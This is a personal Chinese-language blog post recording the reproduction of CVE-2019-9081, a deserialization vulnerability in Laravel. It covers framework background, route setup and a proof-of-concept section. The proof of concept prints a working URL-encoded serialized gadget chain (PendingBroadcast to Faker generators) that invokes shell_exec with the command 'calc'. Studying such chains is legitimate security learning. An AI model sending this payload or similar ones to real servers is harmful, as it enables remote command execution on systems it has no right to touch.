cve-2019-9081-recurrence
cve-2019-9081-recurrence
最近翔哥问了关于cve-2019-9081的复现问题。
参考的资料:
https://blog.csdn.net/qq_46918279/article/details/120519297
0x00 预备知识
yii与Laravel都是简洁、优雅的PHP Web开发框架(PHP Web Framework)。而composer是PHP的包管理、包依赖关系管理工具,有了它,我们就很轻松一个命令就可以把他人优秀的代码用到我们的项目中来,而且很容易管理依赖关系,更新删除等操作也很轻易的实现。(ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架)
0x01 一些bug
就是按照上述参考资料的视频一步步地做,克服万难。其中一个小问题就是controller与route的书写,参考链接如下:
https://www.php.cn/phpkj/laravel/492215.html
相关代码如下:
1 | // AdminController.php |
并在routes/web.php
下加入:
1 | Route::match(['GET', 'POST'], '/admin', 'AdminController@getPostIndex'); |
0x02 总结&poc
其实学到的远比博客中多得多,最耗时的就是在于沉下心来一个一个的试。总结了一下,链子不长。
1 | // poc.php |
输出
1 | O%3A40%3A%22Illuminate%5CBroadcasting%5CPendingBroadcast%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00events%22%3BO%3A20%3A%22Faker%5CValidGenerator%22%3A3%3A%7Bs%3A12%3A%22%00%2A%00generator%22%3BO%3A22%3A%22Faker%5CDefaultGenerator%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00default%22%3Bs%3A4%3A%22calc%22%3B%7Ds%3A12%3A%22%00%2A%00validator%22%3Bs%3A10%3A%22shell_exec%22%3Bs%3A13%3A%22%00%2A%00maxRetries%22%3Bi%3A1%3B%7Ds%3A8%3A%22%00%2A%00event%22%3Bs%3A5%3A%22good%21%22%3B%7D |
0x02 另一条链子
自己自己找一找有没有别的链子。
To be continued.
留言
- 文章链接: https://wd-2711.tech/
- 版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-ND 4.0 许可协议。转载请注明出处!